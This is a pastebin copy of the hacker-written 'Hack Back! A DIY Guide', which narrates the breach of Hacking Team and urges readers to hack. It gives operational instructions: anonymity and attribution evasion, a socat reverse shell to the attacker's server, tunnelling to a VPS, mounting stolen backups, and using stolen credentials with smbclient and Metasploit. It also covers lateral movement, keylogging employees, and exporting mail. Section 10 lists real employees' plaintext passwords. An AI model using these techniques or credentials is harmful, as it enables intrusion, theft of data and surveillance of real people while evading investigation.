Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _ _ _ ____ _ _
- | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
- | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
- | _ | (_| | (__| < | |_) | (_| | (__| <|_|
- |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
- A DIY Guide
- ,-._,-._
- _,-\ o O_/;
- / , ` `|
- | \-.,___, / `
- \ `-.__/ / ,.\
- / `-.__.-\` ./ \'
- / /| ___\ ,/ `\
- ( ( |.-"` '/\ \ `
- \ \/ ,, | \ _
- \| o/o / \.
- \ , / /
- ( __`;-;'__`) \\
- `//'` `||` `\
- _// || __ _ _ _____ __
- .-"-._,(__) .(__).-""-. | | | | |_ _| |
- / \ / \ | | |_| | | | |
- \ / \ / | | _ | | | |
- `'-------` `--------'` __| |_| |_| |_| |__
- #antisec
- ----[ 1 - Introduction ]-------------------------------------------
- Note the change in language since the last issue [1]. The
- English-speaking worlds already has books, talks, guides, and all
- sorts of information about hacking. There are a lot of hackers in that
- world who are better than I am, but disgracefully fritter away their
- knowledge working as "defence" contractors, for intelligence agencies,
- protecting banks and corporations and defending the established order.
- Hacker culture in the EU originated as a counterculture, but all
- that's left of that origin is the aesthetic -- everything else has
- been assimilated. At least they get to wear a T-shirt, dye their hair
- blue, use hacker handles, and feel like rebels while they work for the
- system.
- There was once a time when you had to break into an office building to
- exfiltrate documents [2]. You used to need a gun to rob a bank. These
- days you can do it all from bed with a laptop in your hands [3][4].
- Like the CNT once said about the Gamma Group hack: "we should move
- forward with these new forms of struggle" [5]. Hacking is a powerful
- tool. Learn it and join the fight!
- [1] http://pastebin.com/raw.php?i=cRYvK4jb
- [2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
- [3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-15092108
- 3914167.html
- [4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
- [5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-
- gamma-group
- ----[ 2 - Hacking Team ]-------------------------------------------
- Hacking Team was a company that helped governments to hack and spy
- on journalists, activists, the political opposition, and other threads
- to their power [1][2][3][4][5][6][7][8][9][10][11] -- as well as,
- every now and then, criminals and terrorists [12]. Vincenzetti, the
- CEO, liked to end his emails with the fascist slogan "boia chi molla".
- He was, more precisely, a "boia chi vende RCS". All the while, he
- claimed to have the technology to solve the "Tor problem" and the
- "darknet problem" [13]. But since I've been able to maintain my
- freedom, I have my doubts about how effective that technology is.
- [1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
- [2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
- [3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
- [4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
- [5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
- [6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
- [7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
- [8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
- [9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
- [10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
- [11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
- [12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
- [13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web
- ----[ 3 - Be careful out there ]-----------------------------------
- Sadly, our world is upside-down. You get richer by doing bad things,
- and get locked up for doing good things. Fortunately, thanks to the
- hard work of people like those in the "Tor Project" [1], you can avoid
- getting yourself locked up by following a few simple guidelines:
- 1) Encrypt your hard drive [2]
- I assume that by the time the police come to impound your computer,
- you've already made many mistakes, but an ounce of prevention is
- worth a pound of cure.
- 2) Use a virtual machine and route all your traffic through Tor
- This achieves two things. First, all of your connections are
- anonymized through the Tor network. Second, keeping your personal
- life and your anonymous life on different computers helps you avoid
- mixing them up by accident.
- You can protect yourself with Whonix [3], Tails [4], Qubes TorVM
- [5], or something personalized [6]. You can find a detailed
- comparison here [7].
- 3) (Optional) Don't connect to the Tor network directly
- Tor is not a panacea. It's possible to correlate the times at which
- your connected to Tor with the times during which your hacker
- handle is active. There have also been attacks using the Tor exit
- node [8]. You can connect to the network using other people's wifi.
- Wifislax [9] is a linux distro with many tools for procuring wifi.
- Another option is to connect to a VPN or a bridge node [10] before
- connecting to Tor, but this is less secure because it is possible
- to correlate the hacker's activity with the internet activity
- coming from your house (this was used as evidence against Jeremy
- Hammond, for example [11]).
- The reality is that while Tor is not perfect, it works well enough.
- When I was young and reckless, I did a lot of things without any
- protection (I'm talking about hacking, here) apart from Tor, and
- which the police were still incapable of investigating, and I never
- had any problems.
- [1] https://www.torproject.org/
- [2] https://info.securityinabox.org/es/chapter-4
- [3] https://www.whonix.org/
- [4] https://tails.boum.org/
- [5] https://www.qubes-os.org/doc/privacy/torvm/
- [6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
- [7] https://www.whonix.org/wiki/Comparison_with_Others
- [8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
- [9] http://www.wifislax.com/
- [10] https://www.torproject.org/docs/bridges.html.en
- [11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html
- ----[ 3.1 - Infrastructure ]---------------------------------------
- I don't hack directly from the Tor exit nodes. They're on blacklists,
- go very slowly, and cannot receive reverse connections. Tor serves to
- protect my anonymity while I connect to the infrastructure I use for
- hacking, which consists of:
- 1) Domain names
- to give directions to command and control (C&C), and for setting up
- DNS tunnels for secure exfiltration.
- 2) Stable server
- to serve as C&C servers for receiving reverse shells, as a place to
- launch attacks from, and a place to stash the loot.
- 3) Hacked servers
- these serve as pivots behind which I hide the IP addresses of
- stables servers, and for when I want a quick connection without
- a pivot -- for portscanning, for example, or scanning the entire
- internet, or downloading a database through sql injection, etc.
- Obviously you have pay anonymously, with bitcoin, for exaple (if you
- use it carefully).
- ----[ 3.2 - Accountability ]----------------------------------------
- In the news we often see attacks attributed to groups of governmental
- hackers ('APTs'), because they always use the same tools, leave the
- same footprints, and even use the same infrastructure (domains,
- emails, etc.). They're negligent because they free to hack without any
- legal consequences.
- I didn't want to make it too easy for the police to link what I did to
- Hacking Team, with its hacks and handles, with my day-to-day work
- as a blackhat hacker. So I used new servers and domains, registered
- with new email accounts, and payed with new bitcoin. And I only used
- tools which were either publically available, or which I had written
- specifically for this attack, and I changed my style of doing things
- so as to not leave my usual forensic footprint.
- ----[ 4 - Gathering information ]----------------------------------
- Though it might be tedious, this step is very important, since the
- larger the attack surface, the easier it will be to find a weakness
- in it, somewhere.
- ----[ 4.1 - Technical Information ]--------------------------------
- Some of the tools and techniques include:
- 1) Google
- You can find a lot of unexpected things with a couple well-chosen
- search queries. The identity of DPR, for example [1]. The bible on
- how to use google for hacking is the book, "Google Hacking for
- Penetration Testers" [2].
- 2) Enumeration of subdomains
- A business's main domain is usually supplied by a third party, and
- you're going to find a range of IP addresses belonging to
- subdomains like mx.company.com, ns1.company.com, etc. And sometimes
- there are things in 'hidden' subdomains that should not be exposed.
- Tools useful for discovering domains are subdomains include fierce
- [3], theHarvester [4], and recon-ng [5].
- 3) Whois queries and inverse queries
- With an inverse query using a domain's whois information or a
- business's IP range, you can find other domains and IP ranges
- belonging to them. As far as I know, there's no free way of making
- inverse whois queries, except for a google 'hack':
- "via della moscova 13" site:www.findip-address.com
- "via della moscova 13" site:domaintools.com
- 4) Portscanning and fingerprinting
- Apart from the other techniques, you can talk to the business's
- employees. I include it in this section because it isn't an attack,
- just a means of obtaining information. The business's IDS might
- generate an alert upon detecting a portscan, but you don't have to
- worry about that. The entire internet is scanning itself
- constantly.
- For scanning, nmap [6] is precise, and can fingerprint most of the
- services it discovers. For businesses with large IP ranges, zmap
- [7] or masscan [8] are fast. WhatWeb [9] and BlindElephant [10] can
- fingerprint websites.
- [1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
- [2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
- [3] http://ha.ckers.org/fierce/
- [4] https://github.com/laramies/theHarvester
- [5] https://bitbucket.org/LaNMaSteR53/recon-ng
- [6] https://nmap.org/
- [7] https://zmap.io/
- [8] https://github.com/robertdavidgraham/masscan
- [9] http://www.morningstarsecurity.com/research/whatweb
- [10] http://blindelephant.sourceforge.net/
- ----[ 4.2 - Social information ]-------------------------------------
- For social engineering, it's very useful to gather information about
- the employees, their roles, contract information, operating system,
- nagivator, plugins, software, etc. Some resources include:
- 1) Google
- Here's the most useful tool, again.
- 2) theHarvester y recon-ng
- I've mentioned these already in the last section, but they have
- much more functionality. You can find a lot of information quickly
- and automatically. It's worth the trouble to read all the
- documentation.
- 3) LinkedIn
- You can find a lot of information about the employees here. The
- businesses' recruiters will be the ones most inclined to talk.
- 4) Data.com
- Previously known as jigsaw. They have contact information for many
- employees.
- 5) File metadata
- You can find a lot of information about employees and their system
- in the metadata of files that the business has published. Some
- handy tools for finding files on a business's website and
- extracting metadata are metagoofil [1] and FOCA [2].
- [1] https://github.com/laramies/metagoofil
- [2] https://www.elevenpaths.com/es/labstools/foca-2/index.html
- ----[ 5 - Entering the Network ]-------------------------------------
- There are various ways to make an entrance. Since the method used for
- Hacking Team is less common and more trouble than is ordinarily
- necessary, I'm going to talk a bit about more common methods, which I
- recommend attempting first.
- ----[ 5.1 - Social engineering ]-------------------------------------
- Social engineering, and specifically spear phishing, is responsible
- for the majority of hacks these days. For an introduction in Spanish,
- see [1]. For more information in English, see [2] (the third part,
- "Targeted Attacks"). For entertaining anecdotes about social
- engineering in the past, see [3]. I didn't want to try spear phishing
- against Hacking Team, since their business is in helping
- governments spear phish their opposition. There was therefore a much
- greater risk of Hacking Team recognizing and investigating said
- attempts.
- [1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
- [2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
- [3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf
- ----[ 5.2 - Buying access ]------------------------------------------
- Thanks to the hardworking Russians and their exploit kits, traffic
- trafickers, and bot farms, many businesses already have compromised
- machines in their network. Almost all of the Fortune 500, with their
- enormous networks, have a few bots on the inside. That said, Hacking
- Team is a very small business, most of whose employees are experts in
- information security, and so there was very little probability that
- they had already been compromised.
- ----[ 5.3 - Technical exploitation ]---------------------------------
- After the Gamma Group hack, I discovered a process for searching for
- vulnerabilities [1]. Hacking Team has the public IP range:
- inetnum: 93.62.139.32 - 93.62.139.47
- descr: HT public subnet
- Hacking Team had a small exposure to the internet. For example, unlike
- the Gamma Group, their public-facing site required the client to have
- a certificate in order to connect. It contained a main website (a
- Joomla blog, for which Joomscan [2] revealed no serious
- vulnerabilities), a mail server, a couple of routers, two VPN systems,
- and a spam-filtering system. And so I had three options: to try to
- find a 0day in Joomla, a 0day in postfix, or a 0day in one of the
- embedded systems. A 0day in an embedded system seemed to me to be the
- most tenable option, and after about two weeks of reverse engineering,
- I discovered a remote root exploit. Since the vulnerabilities it
- relies on haven't yet been patched, I'm not going to give any more
- details on it. For more information on how to search for this type of
- vulnerability, see [3] and [4].
- [1] http://pastebin.com/raw.php?i=cRYvK4jb
- [2] http://sourceforge.net/projects/joomscan/
- [3] http://www.devttys0.com/
- [4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A
- ----[ 6 - Be prepared ]----------------------------------------------
- I did a lot of work and testing before using the exploit against
- Hacking Team. I wrote a firmware with a backdoor, and compiled various
- post-exploitation tools for the embedded system. The backdoor served
- to protect the exploit. Using the exploit just once and then returning
- thorugh the back door made the work of discovering and patching
- vulnerabilities more difficult.
- The post-exploitation tools I had prepared were:
- 1) busybox
- for all the common Unix utilities that the system didn't have.
- 2) nmap
- for scanning and fingerprinting Hacking Team's internal network.
- 3) Responder.py
- the most useful tool for attacking Windows when you have access to
- the internal network but don't have a user account.
- 4) Python
- for executing Responder.py.
- 5) tcpdump
- for sniffing traffic.
- 6) dsniff
- for snooping passwords from vulnerable protocols like ftp, and for
- arpspoofing. I'd rather have used ettercap, writen by Hacking
- Team's own ALoR and NaGA, but it was difficult to compile for the
- system.
- 7) socat
- for a handy pty shell:
- my_server: socat file: `tty`, raw, echo=0, tcp-listen:mi_port
- hacked_system: socat exec:'bash -li',pty,stderr,setsid,sigint,\
- sane tcp:my_server:my_port
- And for many other things. It's a network swiss army knife. See the
- examples section of its documentation.
- 8) screen
- like socat's pty, not strictly necessary, but I wanted to feel at
- home in Hacking Team's network.
- 9) a SOCKS proxy server
- to use together with proxychains for accessing the internal network
- with this or that other programme.
- 10) tgcd
- for forwarding ports, like those of the SOCKS server, through the
- firewall.
- [1] https://www.busybox.net/
- [2] https://nmap.org/
- [3] https://github.com/SpiderLabs/Responder
- [4] https://github.com/bendmorris/static-python
- [5] http://www.tcpdump.org/
- [6] http://www.monkey.org/~dugsong/dsniff/
- [7] http://www.dest-unreach.org/socat/
- [8] https://www.gnu.org/software/screen/
- [9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
- [10] http://tgcd.sourceforge.net/
- The worst thing that could happen would be that my backdoor or
- post-exploit tools would make the system unstable, and force an
- employee to investigate. So I spent a week testing my exploit,
- backdoor, and post-exploit tools in the networks of other vulnerable
- businesses before entering Hacking Team network.
- ----[ 7 - Watch and listen ]----------------------------------------
- Now that I was inside the internal network, I wanted to take a look
- around and think about my next step. Switching Responder.py to
- analysis mode (-A, to listen without sending poisoned responses), and
- performed a slow scan with nmap.
- ----[ 8 - NoSQL databases ]-----------------------------------------
- NoSQL, or rather NoAuthentication, has been a great gift to the hacker
- community [1]. Just when I was worrying that all MySQL's sins of
- omission had finally been patched [2][3][4][5], these new databases
- appear, lacking authentication by design. Nmap found a few in Hacking
- Team's internal network:
- 27017/tcp open mongodb MongoDB 2.6.5
- | mongodb-databases:
- | ok = 1
- | totalSizeMb = 47547
- | totalSize = 49856643072
- ...
- |_ version = 2.6.5
- 27017/tcp open mongodb MongoDB 2.6.5
- | mongodb-databases:
- | ok = 1
- | totalSizeMb = 31987
- | totalSize = 33540800512
- | databases
- ...
- |_ version = 2.6.5
- These were databases for RCS test instances. The audio that RCS
- captures is held in a MongoDB with GridFS. This is where the audio
- folder in the torrent [6] came from. They had inadvertantly spied on
- themselves.
- [1] https://www.shodan.io/search?query=product%3Amongodb
- [2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
- [3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
- [4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
- [5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
- [6] https://ht.transparencytoolkit.org/audio/
- ----[ 9 - Crossed wires ]-------------------------------------------
- As fun as it was to listen to captures and watch webcam images of
- Hacking Team developing its malware, it wasn't very useful. Their
- insecure security backups were the vulnerability that threw the doors
- open. According to the documentation [1], their iSCSI systems should
- have been on a separate network, but nmap count a few of them in their
- 192.168.1.200/24 subnet:
- ...
- 3260/tcp open iscsi?
- | iscsi-info:
- | Target: iqn.2000-01.com.synology:ht-synology.name
- | Address: 192.168.200.66:3260,0
- |_ Authentication: No authentication required
- Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
- ...
- 3260/tcp open iscsi?
- | iscsi-info:
- | Target: iqn.2000-01.com.synology:synology-backup.name
- | Address: 10.0.1.72:3260,0
- | Address: 192.168.200.72:3260,0
- |_ Authentication: No authentication required
- iSCSI requires a kernel module, and it would have been difficult to
- compile it for the embedded system. I forwarded the port so that I
- could mount it from a VPS:
- VPS: tgcd -L -p 3260 -q 42838
- Sistema embebida: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838
- VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1
- iSCSI now finds the name iqn.2000-01.com.synology, but has some
- problems mounting it since it now believes that its address is both
- 192.168.200.72 and 127.0.0.1.
- The to solve this is:
- iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1
- and then:
- iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login
- ...and the archive system appears! We mount it:
- vmfs-fuse -o ro /dev/sdb1 /mnt/tmp
- and find secure backups of various virtual machines. The Exchange
- server seems like the most interesting. It's too big to download, but
- we can mount it remotely and search for interesting archives:
- $ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
- $ fdisk -l /dev/loop0
- /dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT
- entonces el offset es 2048 * 512 = 1048576
- $ losetup -o 1048576 /dev/loop1 /dev/loop0
- $ mount -o ro /dev/loop1 /mnt/exchange/
- and now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14
- 172311 we find the hard drive of the virtual machine, and mount it:
- vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
- mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1
- ...and, finally, we have gotten to the centre of the matryoshka doll
- and we can see all of the archives of the old Exchange server on
- /mnt/part1.
- [1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/Infras
- trutturaIT/Rete/infrastruttura%20ht.pdf
- ----[10 - From secure backups to domain admin ]---------------------
- What interested me most in the secure backup was trying to find a
- password or hash that I could use to access the actual server. I used
- pwdump, cachedump, and lsadump [1] with the registry backups. lsdadump
- found a password for the besadmin service account:
- _SC_BlackBerry MDS Connection Service
- 0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
- 0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
- 0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........
- I used proxychains [2] with the socks server in the embedded system
- and smbclient [3] to check the password:
- proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'
- It worked! The besadmin password was still valid, and was a local
- admin. I used my proxy and metasploit's psexec_psh [4] to gain a
- meterpreter session. I migrated to a 64-bit process, "load kiwi [5],
- and "creds_wdigest", and by now had a number of passwords, including
- the domain admin's:
- HACKINGTEAM BESAdmin bes32678!!!
- HACKINGTEAM Administrator uu8dd8ndd12!
- HACKINGTEAM c.pozzi P4ssword <---- look! the sysadmin!
- HACKINGTEAM m.romeo ioLK/(90
- HACKINGTEAM l.guerra 4luc@=.=
- HACKINGTEAM d.martinez W4tudul3sp
- HACKINGTEAM g.russo GCBr0s0705!
- HACKINGTEAM a.scarafile Cd4432996111
- HACKINGTEAM r.viscardi Ht2015!
- HACKINGTEAM a.mino A!e$$andra
- HACKINGTEAM m.bettini Ettore&Bella0314
- HACKINGTEAM m.luppi Blackou7
- HACKINGTEAM s.gallucci 1S9i8m4o!
- HACKINGTEAM d.milan set!dob66
- HACKINGTEAM w.furlan Blu3.B3rry!
- HACKINGTEAM d.romualdi Rd13136f@#
- HACKINGTEAM l.invernizzi L0r3nz0123!
- HACKINGTEAM e.ciceri 2O2571&2E
- HACKINGTEAM e.rabe erab@4HT!
- [1] https://github.com/Neohapsis/creddump7
- [2] http://proxychains.sourceforge.net/
- [3] https://www.samba.org/
- [4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
- [5] https://github.com/gentilkiwi/mimikatz
- ----[ 11 - Downloading the mail ]-----------------------------------
- Now that I had the password to the domain's admin, I had access to the
- email, the hard of the business. Since every password I used raised
- the risk of being detected, I download the emails before going on to
- explore them. Powershell makes this easy [1]. Curiously, I found a bug
- in the way that dates were handled. After obtaining the emails, I
- waited a couple of weeks before getting the source code and all the
- rest, returning once in a while to download new emails. The server was
- Italian, with dates in the format day/month/year. I used:
- -ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}
- with New-MailboxExportRequest to download the new mails (in this case
- all the mails from June 5th onward). The problem was that it said that
- the date is invalid if the day is greater than 12 (imagine that this
- is because the month is usually put first in the EU, and the month
- can't be greater than 12). It seems that the engineers at Microsoft
- had only tested their software on their own regional configuration.
- [1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/
- ----[ 12 - Downloading archives ]-----------------------------------
- Now that I was the domain's admin, I started downloading the shared
- resources using my proxy and smbclient's -Tc option. For example:
- proxychains smbclient '//192.168.1.230/FAE DiskStation' \
- -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'
- This is where the Amministrazione, FAE DiskStation, and FileServer
- folders in the torrent came from.
- ----[ 13 - Introduction to hacking a Windows domain ]---------------
- I'd like to take a break from the story of these fuckers [weones
- culiaos], to share a bit of knowledge about attacking Windows
- networks.
- ----[ 13.1 - Lateral movement ]-------------------------------------
- I'm going to give a quick review of the techniques used for spreading
- out inside a Windows network. The techniques for remote execution
- require a local administrator's password or hash to work. Often, the
- most common way of obtaining these credentials is to use mimikatz [1],
- and above all sekurlsa::logonpasswords and sekurlsa::msv, from the
- machines you already have administrative access to. The techniques for
- moving around "in situ" also require administrative privileges (except
- for runas). The most important tools for
- privilege escalation are PowerUp [2], and bypassuac [3].
- [1] https://adsecurity.org/?page_id=1821
- [2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
- [3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1
- Remote navigation:
- 1) psexec
- The tried and tested way of navigating Windows networks. You can
- use psexec [1], winexe [2], metasploit's psexec_psh [3], powershell
- empire's invoke_psexec [4], or the Windows command "sc" [5]. For
- the metasploit module, powershell empire, and pth-winexe [6], it's
- enough to know the hash without knowing the password. This is the
- most universal way (it works on any computer with port 445 open),
- but it is also the least cautious. Events of type 7045 "Service
- Control Manager" will appear in the registry. In my experience,
- this has never tipped anyone off during a hack, but it's something
- they might notice afterwards, and it might help the investigators
- figure out what the hacker was doing.
- 2) WMI
- The most cautious method. The WMI service is enabled on all Windows
- computers, except for servers, where the firewall blocks it by
- default. You can use wmiexec.py [7], pth-wmis [6] (you can find a
- demo of wmiexec and pth-wmis here [8]), powershell empires's
- invoke_wmi, or the Windows command, wmic [5]. Aside from wmic, the
- rest of these require only the hash.
- 3) PSRemoting [10]
- This is disabled by default, and I don't advise enabling new
- protocols unless you have you. But if the sysadmin has already
- enabled it, it's very convenient, especially if you use powershell
- for everything (and yes, you should use powershell for almost
- everything; this may change [11] with powershell 5 and Windows 10,
- but right now powershell makes it easy to do everything in RAM,
- dodge the antivirus, and leave few footprints).
- 4) Programmed tasks
- You can execute programmes remotely with at and schtasks [5]. They
- work in the same situations as psexec, and likewise leave some
- known footprints [12].
- 5) GPO
- If all of those protocols are disabled or blocked by the firewall,
- once you are the administrator of the domain, you can use GPO to
- give it a logon script, install an msi, execute a programmed task
- [13], or as we will see with computer of Mauro Romeo (Hacking
- Team's sysadmin), enable WMI and open the firewall through GPO.
- [1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
- [2] https://sourceforge.net/projects/winexe/
- [3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
- [4] http://www.powershellempire.com/?page_id=523
- [5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-
- cc/
- [6] https://github.com/byt3bl33d3r/pth-toolkit
- [7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
- [8] https://www.trustedsec.com/june-2015/no_psexec_needed/
- [9] http://www.powershellempire.com/?page_id=124
- [10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
- [11] https://adsecurity.org/?p=2277
- [12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
- [13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py
- Navigation 'in situ':
- 1) Impersonating tokens
- Once you have administrative access to a computer, you can use
- other users' tokens to access the domain's resources. Two tools for
- doing this are incognito [1] and the token::* commands in mimikatz
- [2].
- 2) MS14-068
- You can take advantage of a validation vulnerability in Kerberos to
- generate a domain administrator ticket [3][4][5].
- 3) Pass the Hash
- If you have your has but the user does not have an active session,
- you can use sekurlsa:pth [2] to obtain a user ticket.
- 4) Process injection
- Any RAT can be injected into another process -- the migrate command
- in meterpreter and pupy [6], for example, or psinject [7] in
- powershell empire. You can inject the process that has the token
- that you want.
- 5) runas
- This sometimes turns out to be very useful because it doesn't
- require admin privileges. The command is part of Windows, but if
- you dont' have the graphical interface, you can use powershell
- [8].
- [1] https://www.indetectables.net/viewtopic.php?p=211165
- [2] https://adsecurity.org/?page_id=1821
- [3] https://github.com/bidord/pykek
- [4] https://adsecurity.org/?p=676
- [5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
- [6] https://github.com/n1nj4sec/pupy
- [7] http://www.powershellempire.com/?page_id=273
- [8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1
- ----[ 13.2 - Persistence ]------------------------------------------
- Once you have gained access, you want to maintain it. Persistence is
- really only a challenge for sons of bitches [hijos de puta] like the
- ones in Hacking Team, who want to hack activists or other individuals.
- When you're hacking businesses, you don't need persistence because the
- business never sleeps. The only 'persistence' I use is in duqu 2's
- sense, executing in the RAM of a couple of servers with high rates of
- uptime. In the hypothetical case that everything is reset at once, I
- have passwords and a golden ticket [1] set aside. You can read more
- information about persistence mechanisms for Windows here [2][3][4].
- But for hacking businesses, you don't need it, and it raises the risk
- of detection.
- [1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-t
- icket-howto/
- [2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-e
- mpire/
- [3] http://www.hexacorn.com/blog/category/autostart-persistence/
- [4] https://blog.netspi.com/tag/persistence/
- ----[ 13.3 - Internal reconnaissance ]------------------------------
- The best tool these days for understanding Windows networks is
- Powerview [1]. It's worth the trouble to read everything by the author
- [2], and above all [3], [4], [5], and [6]. Powershell is, again, very
- powerful [7]. But since there are still many 2003 and 2000 servers
- without powershell, you should also look the old school way [8], with
- tools like netview.exe [9] or the windows "new view" command. Other
- techniques that I like are:
- 1) Download a list archive numbers
- With the domain administrator account, you can download all the
- archive numbers in the network with powerview:
- Inqvoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
- select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1]
- | select fullname | out-file -append files.txt}
- You can then read it at your leisure later on, and choose the ones
- that you want to download.
- 2) Read emails
- As we have already seen, you can download emails with powershell,
- and obtain a lot of useful information.
- 3) Read sharepoint
- This is another place where many businesses have important
- information. You can download it with powershell [10].
- 4) Active Directory [11]
- It holds a lot of useful information about users and computers.
- Without being the domain admin, you can already find a great deal
- of information with powerview and other tools [12]. After becoming
- the domain admin, you should export all the information from AD
- using csvde or some other tools.
- 5) Spy on the employees
- One of my favourite passtimes is stalk the sysadmins. By spying on
- Christian Pozzi (Hacking Team's sysadmin), I gained access to the
- Nagios server, which gave me access to the 'rete sviluppo' (the
- development network with the RCS source code). With a simple
- combination of PowerSploit's Get-Keystrokes and Get-TimedScreenshot
- [13], nishang's Do-Exfiltration, and GPO, I could spy on any
- employee I wanted, or even the entire domain.
- [1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
- [2] http://www.harmj0y.net/blog/tag/powerview/
- [3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
- [4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
- [5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
- [6] http://www.slideshare.net/harmj0y/i-have-the-powerview
- [7] https://adsecurity.org/?p=2535
- [8] https://www.youtube.com/watch?v=rpwrKhgMd7E
- [9] https://github.com/mubix/netview
- [10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
- [11] https://adsecurity.org/?page_id=41
- [12] http://www.darkoperator.com/?tag=Active+Directory
- [13] https://github.com/PowerShellMafia/PowerSploit
- [14] https://github.com/samratashok/nishang
- ----[ 14 - Stalking sysadmins ]-------------------------------------
- Reading the infrastructure's documentation [1], I learned that I still
- lacked access to something important -- the 'Rete Sviluppo', an
- isolated network that held the source code of RCS. The sysadmins of a
- business always have access to everything. I searched through Mauro
- Romeo and Christian Pozzi's computers to see how they accessed the
- rete sviluppo, and to see if they had other interesting systems that I
- should investigate. It was easy to access their computers, since they
- were part of the Windows domain that I had adminstrative control over.
- Muro Romeo's computer didn't have an open port, so I opened the WMI
- port [2] so that I could execute meterpreter [3]. Besides collecting
- keystrokes and screencaps with Get-Keystrokes and Get-TimedScreenshot,
- I used a lot of metasploit's /gather/ modules, CredMan.ps1 [4], and I
- searched the archives [5]. I saw that Pozzi had a Truecrypt volume,
- and waited for him to mount it so that I could copy an archive of it.
- A lot of people have had a good laugh at Christian Pozzi's weak
